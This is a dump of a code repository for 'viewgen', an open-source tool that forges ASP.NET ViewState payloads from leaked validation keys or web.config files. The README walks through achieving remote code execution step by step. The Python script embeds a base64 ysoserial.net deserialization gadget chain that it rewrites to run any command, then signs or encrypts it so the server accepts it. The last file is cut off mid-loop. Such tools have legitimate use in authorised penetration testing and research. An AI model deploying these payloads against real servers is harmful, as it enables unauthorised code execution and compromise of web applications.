├── .gitignore
├── Dockerfile
├── LICENSE
├── README.md
├── install.sh
├── requirements.txt
└── viewgen


/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | *$py.class
  5 | 
  6 | # C extensions
  7 | *.so
  8 | 
  9 | # Distribution / packaging
 10 | .Python
 11 | build/
 12 | develop-eggs/
 13 | dist/
 14 | downloads/
 15 | eggs/
 16 | .eggs/
 17 | lib/
 18 | lib64/
 19 | parts/
 20 | sdist/
 21 | var/
 22 | wheels/
 23 | *.egg-info/
 24 | .installed.cfg
 25 | *.egg
 26 | MANIFEST
 27 | 
 28 | # PyInstaller
 29 | #  Usually these files are written by a python script from a template
 30 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 31 | *.manifest
 32 | *.spec
 33 | 
 34 | # Installer logs
 35 | pip-log.txt
 36 | pip-delete-this-directory.txt
 37 | 
 38 | # Unit test / coverage reports
 39 | htmlcov/
 40 | .tox/
 41 | .coverage
 42 | .coverage.*
 43 | .cache
 44 | nosetests.xml
 45 | coverage.xml
 46 | *.cover
 47 | .hypothesis/
 48 | .pytest_cache/
 49 | 
 50 | # Translations
 51 | *.mo
 52 | *.pot
 53 | 
 54 | # Django stuff:
 55 | *.log
 56 | local_settings.py
 57 | db.sqlite3
 58 | 
 59 | # Flask stuff:
 60 | instance/
 61 | .webassets-cache
 62 | 
 63 | # Scrapy stuff:
 64 | .scrapy
 65 | 
 66 | # Sphinx documentation
 67 | docs/_build/
 68 | 
 69 | # PyBuilder
 70 | target/
 71 | 
 72 | # Jupyter Notebook
 73 | .ipynb_checkpoints
 74 | 
 75 | # pyenv
 76 | .python-version
 77 | 
 78 | # celery beat schedule file
 79 | celerybeat-schedule
 80 | 
 81 | # SageMath parsed files
 82 | *.sage.py
 83 | 
 84 | # Environments
 85 | .env
 86 | .venv
 87 | env/
 88 | venv/
 89 | ENV/
 90 | env.bak/
 91 | venv.bak/
 92 | 
 93 | # Spyder project settings
 94 | .spyderproject
 95 | .spyproject
 96 | 
 97 | # Rope project settings
 98 | .ropeproject
 99 | 
100 | # mkdocs documentation
101 | /site
102 | 
103 | # mypy
104 | .mypy_cache/
105 | 


--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM python:3.13-alpine as base
 2 | 
 3 | FROM base as build
 4 | 
 5 | WORKDIR /build
 6 | 
 7 | RUN apk add gcc musl-dev
 8 | COPY requirements.txt /requirements.txt
 9 | RUN pip install --prefix /build -r /requirements.txt
10 | 
11 | FROM base
12 | 
13 | COPY --from=build /build /usr/local
14 | 
15 | WORKDIR /tool
16 | 
17 | COPY viewgen /tool
18 | RUN chmod +x viewgen
19 | 
20 | ENTRYPOINT ["/tool/viewgen"]
21 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2019 André Baptista
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # Viewgen
  2 | 
  3 | ### ASP.NET ViewState Generator
  4 | 
  5 | **viewgen** is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys or `web.config` files
  6 | 
  7 | ---------------
  8 | 
  9 | ### Installation
 10 | 
 11 | **Requirements**: Python 3
 12 | 
 13 | `pip3 install --user --upgrade -r requirements.txt` or `./install.sh`
 14 | 
 15 | **Docker**
 16 | 
 17 | `docker build -t viewgen .` or `docker pull 0xacb/viewgen`
 18 | 
 19 | ---------------
 20 | 
 21 | ### Usage
 22 | ```
 23 | $ viewgen -h
 24 | usage: viewgen [-h] [--webconfig WEBCONFIG] [-m MODIFIER]
 25 |                [--viewstateuserkey VIEWSTATEUSERKEY] [-c COMMAND] [--decode]
 26 |                [--guess] [--check] [--vkey VKEY] [--valg VALG] [--dkey DKEY]
 27 |                [--dalg DALG] [-u] [-e] [-f FILE] [--version]
 28 |                [payload]
 29 | 
 30 | viewgen is a ViewState tool capable of generating both signed and encrypted
 31 | payloads with leaked validation keys or web.config files
 32 | 
 33 | positional arguments:
 34 |   payload               ViewState payload (base 64 encoded)
 35 | 
 36 | options:
 37 |   -h, --help            show this help message and exit
 38 |   --webconfig WEBCONFIG
 39 |                         automatically load keys and algorithms from a
 40 |                         web.config file
 41 |   -m MODIFIER, --modifier MODIFIER
 42 |                         VIEWSTATEGENERATOR value
 43 |   --viewstateuserkey VIEWSTATEUSERKEY
 44 |                         ViewStateUserKey CSRF value
 45 |   -c COMMAND, --command COMMAND
 46 |                         command to execute
 47 |   --decode              decode a ViewState payload
 48 |   --guess               guess signature and encryption mode for a given
 49 |                         payload
 50 |   --check               check if modifier and keys are correct for a given
 51 |                         payload
 52 |   --vkey VKEY           validation key
 53 |   --valg VALG           validation algorithm
 54 |   --dkey DKEY           decryption key
 55 |   --dalg DALG           decryption algorithm
 56 |   -u, --urlencode       URL encode viewstates
 57 |   -e, --encrypted       ViewState is encrypted
 58 |   -f FILE, --file FILE  read ViewState payload from file
 59 |   --version             show viewgen version
 60 | ```
 61 | 
 62 | ---------------
 63 | 
 64 | ### Examples
 65 | 
 66 | ```bash
 67 | $ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
 68 | [+] ViewState
 69 | (('1628925133', (None, [3, (['enctype', 'multipart/form-data'], None)])), None)
 70 | [+] Signature
 71 | 7441f6eeb4fab5a5f30d6ba99908c08eb683b9e6
 72 | [+] Signature match
 73 | 
 74 | $ viewgen --webconfig web.config --modifier CA0B0334 "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk"
 75 | r4zCP5CdSo5R9XmiEXvp1LHVzX1uICmY7oW2WD/gKS/Mt/s+NKXrMpScr4Gvrji7lFdHPOttFpi2x7YbmQjEjJ2NdBMuzeKFzIuno2DenYF8yVVKx5+LL7LYmI0CVcNQ+jH8VxvzVG58NQIJ/rSr6NqNMBahrVfAyVPgdL4Eke3Bq4XWk6BYW2Bht6ykSHF9szT8tG6KUKwf+T94hFUFNIXXkURptwQJEC/5AMkFXMU0VXDa
 76 | 
 77 | $ viewgen --guess "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkuVmqYhhtcnJl6Nfet5ERqNHMADI="
 78 | [+] ViewState is not encrypted
 79 | [+] Signature algorithm: SHA1
 80 | 
 81 | $ viewgen --guess "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
 82 | [!] ViewState is encrypted
 83 | [+] Algorithm candidates:
 84 | AES SHA1
 85 | DES/3DES SHA1
 86 | ```
 87 | 
 88 | ---------------
 89 | 
 90 | ### Achieving Remote Code Execution
 91 | 
 92 | Leaking the `web.config` file or validation keys from ASP.NET apps results in RCE via ObjectStateFormatter deserialization if ViewStates are used.
 93 | 
 94 | You can use the built-in `command` option ([ysoserial.net](https://github.com/pwntester/ysoserial.net) based) to generate a payload:
 95 | 
 96 | ```bash
 97 | $ viewgen --webconfig web.config -m CA0B0334 -c "ping yourdomain.tld"
 98 | ```
 99 | 
100 | However, you can also generate it manually:
101 | 
102 | **1 -** Generate a payload with [ysoserial.net](https://github.com/pwntester/ysoserial.net):
103 | 
104 | ```bash
105 | > ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "ping yourdomain.tld"
106 | ```
107 | 
108 | **2 -** Grab a modifier (`__VIEWSTATEGENERATOR` value) from a given endpoint of the webapp
109 | 
110 | **3 -** Generate the signed/encrypted payload:
111 | 
112 | ```bash
113 | $ viewgen --webconfig web.config --modifier MODIFIER PAYLOAD
114 | ```
115 | 
116 | **4 -** Send a `POST` request with the generated ViewState to the same endpoint
117 | 
118 | **5 -** Profit 🎉🎉
119 | 
120 | ---------------
121 | 
122 | **Thanks**
123 | 
124 | - [@orange_8361](https://twitter.com/orange_8361), the author of *Why so Serials* (HITCON CTF 2018)
125 | - [@infosec_au](https://twitter.com/infosec_au)
126 | - [@smiegles](https://twitter.com/smiegles)
127 | - **BBAC**
128 | - All contributors
129 | 
130 | ---------------
131 | 
132 | **CTF Writeups**
133 | 
134 | - https://xz.aliyun.com/t/3019
135 | - https://cyku.tw/ctf-hitcon-2018-why-so-serials/
136 | 
137 | **Blog Posts**
138 | 
139 | - https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/
140 | 
141 | **Talks**
142 | 
143 | - https://illuminopi.com/assets/files/BSidesIowa_RCEvil.net_20190420.pdf
144 | - https://speakerdeck.com/pwntester/dot-net-serialization-detecting-and-defending-vulnerable-endpoints
145 | 
146 | ---------------
147 | 
148 | ### ⚠ Legal Disclaimer ⚠
149 | 
150 | This project is made for educational and ethical testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. Developers assume no liability and are not responsible for any misuse or damage caused by this tool.
151 | 


--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | pip3 install --upgrade -r requirements.txt
4 | sudo cp viewgen /usr/local/bin/
5 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | colored
2 | viewstate
3 | pycryptodome
4 | 


--------------------------------------------------------------------------------
/viewgen:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | 
  3 | 
  4 | from pprint import pprint
  5 | from Crypto.Cipher import AES
  6 | from Crypto.Cipher import DES
  7 | from Crypto.Cipher import DES3
  8 | from viewstate import ViewState
  9 | from xml.dom import minidom
 10 | from colored import fg, attr
 11 | 
 12 | import argparse
 13 | import hashlib
 14 | import hmac
 15 | import base64
 16 | import os
 17 | import binascii
 18 | import struct
 19 | import sys
 20 | import urllib.parse
 21 | 
 22 | 
 23 | VERSION = 0.3
 24 | 
 25 | 
 26 | pad = lambda s, bs: s + (bs - len(s) % bs) * chr(bs - len(s) % bs).encode("ascii")
 27 | unpad = lambda s: s[:-ord(s[len(s)-1:])]
 28 | 
 29 | 
 30 | def success(s):
 31 | 	print("[%s+%s] %s%s%s%s" % (fg("light_green"), attr(0), attr(1), s, attr(21), attr(0)))
 32 | 
 33 | 
 34 | def warning(s):
 35 | 	print("[%s!%s] %s%s%s%s" % (fg("yellow"), attr(0), attr(1), s, attr(21), attr(0)))
 36 | 
 37 | 
 38 | class ViewGen:
 39 | 	MD5_MODIFIER = b"\x00"*4
 40 | 	hash_algs = {"SHA1": hashlib.sha1, "MD5": hashlib.md5, "SHA256": hashlib.sha256, "SHA384": hashlib.sha384, "SHA512": hashlib.sha512, "AES": hashlib.sha1, "3DES": hashlib.sha1}
 41 | 	hash_sizes = {"SHA1": 20, "MD5": 16, "SHA256": 32, "SHA384": 48, "SHA512": 64, "AES": 20, "3DES": 20}
 42 | 
 43 | 	def __init__(self, validation_key=None, validation_alg=None, dec_key=None, dec_alg=None, modifier=None, encrypted=False, viewstateuserkey=None):
 44 | 		self.validation_key = validation_key
 45 | 		self.dec_key = dec_key
 46 | 		self._init_validation_alg(validation_alg)
 47 | 		self._init_dec_alg(dec_alg)
 48 | 		self.encrypted = encrypted
 49 | 		if modifier is None:
 50 | 			self.modifier = ViewGen.MD5_MODIFIER
 51 | 		else:
 52 | 			self.modifier = struct.pack("<I", int(modifier, 16))
 53 | 		if viewstateuserkey:
 54 | 			self.viewstateuserkey = bytes(viewstateuserkey, "utf-16le")
 55 | 			self.modifier += self.viewstateuserkey
 56 | 		self.modifier_size = 4 + len(bytes(args.viewstateuserkey, "utf-16le")) if args.viewstateuserkey else 4
 57 | 		self._reuse_iv = False
 58 | 		self._iv = None
 59 | 		self._random_bytes = None
 60 | 
 61 | 	def encode(self, payload, reuse_iv=False):
 62 | 		self._reuse_iv = reuse_iv
 63 | 		if self.encrypted:
 64 | 			return self.encrypt_and_sign(payload)
 65 | 		return self.sign(payload)
 66 | 
 67 | 	def decode(self, payload, parse=False):
 68 | 		if self.encrypted:
 69 | 			payload, signature = self.decrypt(payload)
 70 | 			vs = ViewState(payload)
 71 | 		else:
 72 | 			vs = ViewState(payload)
 73 | 			try:
 74 | 				vs.decode()
 75 | 				signature = vs.signature
 76 | 				if self.validation_alg is None:
 77 | 					self.validation_alg = vs.mac
 78 | 				payload = base64.b64encode(base64.b64decode(payload)[:-self._get_hash_size()])
 79 | 			except:
 80 | 				return None, None
 81 | 
 82 | 		if parse:
 83 | 			return vs.decode(), signature
 84 | 
 85 | 		return payload, signature
 86 | 
 87 | 	def encrypt(self, data):
 88 | 		iv = self._iv
 89 | 		random_bytes = self._random_bytes
 90 | 		
 91 | 		if self.dec_alg == "AES":
 92 | 			if not self._reuse_iv:
 93 | 				iv = self._gen_random_bytes(AES.block_size)
 94 | 				random_bytes = self._gen_random_bytes(len(self.dec_key) - AES.block_size)
 95 | 			cipher = AES.new(self.dec_key, AES.MODE_CBC, iv)
 96 | 			payload = pad(random_bytes + data + self.modifier, AES.block_size)
 97 | 		elif self.dec_alg == "DES":
 98 | 			if not self._reuse_iv:
 99 | 				iv = self._gen_random_bytes(DES.block_size)
100 | 			cipher = DES.new(self.dec_key[:8], DES.MODE_CBC, iv)
101 | 			payload = pad(data + self.modifier, DES.block_size)
102 | 		elif self.dec_alg == "3DES":
103 | 			if not self._reuse_iv:
104 | 				iv = self._gen_random_bytes(DES3.block_size)
105 | 			cipher = DES3.new(self.dec_key[:24], DES3.MODE_CBC, iv)
106 | 			payload = pad(data + self.modifier, DES3.block_size)
107 | 		else:
108 | 			return None
109 | 
110 | 		return cipher.encrypt(payload), iv
111 | 
112 | 	def decrypt(self, payload):
113 | 		data = base64.b64decode(payload)
114 | 		hash_size = self._get_hash_size()
115 | 		if self.dec_alg == "AES":
116 | 			iv = data[0:AES.block_size]
117 | 			enc = data[AES.block_size:-hash_size]
118 | 			cipher = AES.new(self.dec_key, AES.MODE_CBC, iv)
119 | 			random_bytes_size = len(self.dec_key) - AES.block_size
120 | 		elif self.dec_alg == "DES":
121 | 			iv = data[0:DES.block_size]
122 | 			enc = data[DES.block_size:-hash_size]
123 | 			cipher = DES.new(self.dec_key[:8], DES.MODE_CBC, iv)
124 | 			random_bytes_size = 0
125 | 		elif self.dec_alg == "3DES":
126 | 			iv = data[0:DES3.block_size]
127 | 			enc = data[DES3.block_size:-hash_size]
128 | 			cipher = DES3.new(self.dec_key[:24], DES3.MODE_CBC, iv)
129 | 			random_bytes_size = 0
130 | 		else:
131 | 			return None
132 | 
133 | 		dec = cipher.decrypt(enc)
134 | 		signature = data[-hash_size:]
135 | 		unpad_dec = unpad(dec)
136 | 		self._random_bytes = unpad_dec[:random_bytes_size]
137 | 		self._iv = iv
138 | 		modifier = unpad_dec[-self.modifier_size:]
139 | 		idx = self.modifier_size
140 | 		if self._double_signature:
141 | 			idx += 20
142 | 
143 | 		return base64.b64encode(unpad_dec[random_bytes_size:-idx]), signature
144 | 
145 | 	def encrypt_and_sign(self, payload):
146 | 		if self._double_signature:
147 | 			payload = self.sign(payload)
148 | 
149 | 		data = base64.b64decode(payload)
150 | 		enc, iv = self.encrypt(data)
151 | 
152 | 		if "MD5" in self.validation_alg:
153 | 			h = hashlib.md5(iv + enc + self.validation_key)
154 | 		else:
155 | 			hash_alg = self._get_hash_alg()
156 | 			if hash_alg:
157 | 				h = hmac.new(self.validation_key, iv + enc, hash_alg)
158 | 			else:
159 | 				return None
160 | 
161 | 		return base64.b64encode(iv + enc + h.digest())
162 | 
163 | 	def sign(self, payload):
164 | 		data = base64.b64decode(payload)
165 | 
166 | 		if "MD5" in self.validation_alg:
167 | 			h = hashlib.md5(data + self.validation_key + ViewGen.MD5_MODIFIER)
168 | 		else:
169 | 			hash_alg = self._get_hash_alg()
170 | 			if hash_alg:
171 | 				h = hmac.new(self.validation_key, data + self.modifier, hash_alg)
172 | 			else:
173 | 				return base64.b64encode(data)
174 | 
175 | 		return base64.b64encode(data + h.digest())
176 | 
177 | 	@staticmethod
178 | 	def guess_algorithms(payload):
179 | 		payload_size = len(base64.b64decode(payload))
180 | 		candidates = []
181 | 		for hash_alg in ViewGen.hash_sizes.keys():
182 | 			hash_size = ViewGen.hash_sizes[hash_alg]
183 | 			if (payload_size - hash_size) % AES.block_size == 0:
184 | 				candidates.append(("AES", hash_alg))
185 | 			if (payload_size - hash_size) % DES.block_size == 0:
186 | 				candidates.append(("DES/3DES", hash_alg))
187 | 		return candidates
188 | 
189 | 	@staticmethod
190 | 	def _gen_random_bytes(n):
191 | 		return os.urandom(n)
192 | 
193 | 	def _init_dec_alg(self, dec_alg):
194 | 		self.dec_alg = dec_alg.upper()
195 | 		if "AUTO" in self.dec_alg:
196 | 			if len(self.dec_key) == 8:
197 | 				self.dec_alg = "DES"
198 | 			else:
199 | 				self.dec_alg = "AES"
200 | 		if self.dec_alg == "3DES":
201 | 			if len(self.dec_key) == 8:
202 | 				self.dec_alg = "DES"
203 | 
204 | 	def _init_validation_alg(self, validation_alg):
205 | 		self.validation_alg = validation_alg.upper()
206 | 		self._double_signature = False
207 | 		if "AES" in self.validation_alg or "3DES" in self.validation_alg:
208 | 			self._double_signature = True
209 | 
210 | 	def _get_hash_size(self):
211 | 		return self._search_dict(ViewGen.hash_sizes, self.validation_alg)
212 | 
213 | 	def _get_hash_alg(self):
214 | 		return self._search_dict(ViewGen.hash_algs, self.validation_alg)
215 | 
216 | 	@staticmethod
217 | 	def _search_dict(d, query):
218 | 		items = [value for key, value in d.items() if query in key.upper()]
219 | 		if not items:
220 | 			return None
221 | 		return items[0]
222 | 
223 | 
224 | def generate_shell_payload(command):
225 | 	# Generated with: https://github.com/pwntester/ysoserial.net
226 | 	ysoserial_net_shell_payload = "/wEy7REAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAADy9jIHBpbmcgOC44LjguOAYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMDAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAABVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBCgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5JbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL"
227 | 	return base64.b64encode(base64.b64decode(ysoserial_net_shell_payload).replace(b"\x0f/c ping 8.8.8.8", bytes("%s%s%s" % (chr(len(command)+3), "/c ", command), "utf-8")))
228 | 
229 | 
230 | def read_webconfig(webconfig_path):
231 | 	document = minidom.parse(webconfig_path)
232 | 	machine_key = document.getElementsByTagName("machineKey")[0]
233 | 	vkey = machine_key.getAttribute("validationKey")
234 | 	valg = machine_key.getAttribute("validation").upper()
235 | 	dkey = machine_key.getAttribute("decryptionKey")
236 | 	dalg = machine_key.getAttribute("decryption").upper()
237 | 	encrypted = False
238 | 
239 | 	for subelement in document.getElementsByTagName("pages"):
240 | 		if subelement.getAttribute("viewStateEncryptionMode") == "Always":
241 | 			encrypted = True
242 | 
243 | 	if valg == "AES" or valg == "3DES":
244 | 		encrypted = True
245 | 
246 | 	return vkey, valg, dkey, dalg, encrypted
247 | 
248 | 
249 | def parse_args():
250 | 	parser = argparse.ArgumentParser(description="viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys or web.config files")
251 | 	parser.add_argument("--webconfig", help="automatically load keys and algorithms from a web.config file", required=False)
252 | 	parser.add_argument("-m", "--modifier", help="VIEWSTATEGENERATOR value", required=False, default="00000000")
253 | 	parser.add_argument("--viewstateuserkey", help="ViewStateUserKey value", required=False)
254 | 	parser.add_argument("-c", "--command", help="command to execute", required=False)
255 | 	parser.add_argument("--decode", help="decode a ViewState payload", required=False, default=False, action="store_true")
256 | 	parser.add_argument("--guess", help="guess signature and encryption mode for a given payload", required=False, default=False, action="store_true")
257 | 	parser.add_argument("--check", help="check if modifier and keys are correct for a given payload", required=False, default=False, action="store_true")
258 | 	parser.add_argument("--vkey", help="validation key", required=False, default="")
259 | 	parser.add_argument("--valg", help="validation algorithm", required=False, default="")
260 | 	parser.add_argument("--dkey", help="decryption key", required=False, default="")
261 | 	parser.add_argument("--dalg", help="decryption algorithm", required=False, default="")
262 | 	parser.add_argument("-u", "--urlencode", help="URL encode viewstates", required=False, default=False, action="store_true")
263 | 	parser.add_argument("-e", "--encrypted", help="ViewState is encrypted", required=False, default=False, action="store_true")
264 | 	parser.add_argument("payload", help="ViewState payload (base 64 encoded)", nargs="?")
265 | 	parser.add_argument("-f", "--file", help="read ViewState payload from file", required=False)
266 | 	parser.add_argument("--version", help="show viewgen version", required=False, action="store_true")
267 | 	args = parser.parse_args()
268 | 
269 | 	if len(sys.argv) == 1:
270 | 		parser.print_help()
271 | 		exit(1)
272 | 	
273 | 	if args.webconfig:
274 | 		args.vkey, args.valg, args.dkey, args.dalg, args.encrypted = read_webconfig(args.webconfig)
275 | 
276 | 	return args
277 | 
278 | 
279 | def run_viewgen(args):
280 | 	if args.version:
281 | 		print("viewgen %s" % VERSION)
282 | 		exit(0)
283 | 	
284 | 	generate = not args.decode and not args.check and not args.guess
285 | 
286 | 	if not args.payload and not args.command:
287 | 		if args.file:
288 | 			with open(args.file) as f:
289 | 				args.payload = f.read()
290 | 		else:
291 | 			args.payload = sys.stdin.read().rstrip()
292 | 
293 | 	if generate or args.check:
294 | 		if args.encrypted:
295 | 			if not args.dkey or not args.dalg:
296 | 				warning("Please provide deryption key and algorithm or a valid web.config")
297 | 				exit(1)
298 | 		else:
299 | 			if not args.vkey or not args.valg:
300 | 				warning("Please provide validation key and algorithm or a valid web.config")
301 | 				exit(1)
302 | 
303 | 	viewgen = ViewGen(binascii.unhexlify(args.vkey), args.valg, binascii.unhexlify(args.dkey), args.dalg, args.modifier, args.encrypted, args.viewstateuserkey)
304 | 
305 | 	if args.decode:
306 | 		viewstate, signature = viewgen.decode(args.payload, parse=True)
307 | 		if not viewstate:
308 | 			warning("ViewState is encrypted")
309 | 			exit(1)
310 | 		success("ViewState")
311 | 		pprint(viewstate)
312 | 		if signature is not None:
313 | 			success("Signature: %s" % str(binascii.hexlify(signature), "utf-8"))
314 | 
315 | 	if args.check:
316 | 		viewstate, sa = viewgen.decode(args.payload)
317 | 		if viewstate is None:
318 | 			warning("ViewState is encrypted")
319 | 			exit(1)
320 | 		encoded = viewgen.encode(viewstate, reuse_iv=True)
321 | 		viewstate, sb = viewgen.decode(encoded)
322 | 
323 | 		if sa == sb:
324 | 			success("Signature match")
325 | 		else:
326 | 			warning("Signature fail")
327 | 
328 | 	if args.guess:
329 | 		viewstate, signature = viewgen.decode(args.payload)
330 | 		if viewstate is None:
331 | 			warning("ViewState is encrypted")
332 | 			candidates = viewgen.guess_algorithms(args.payload)
333 | 			success("Algorithm candidates:")
334 | 			if candidates:
335 | 				for candidate in candidates:
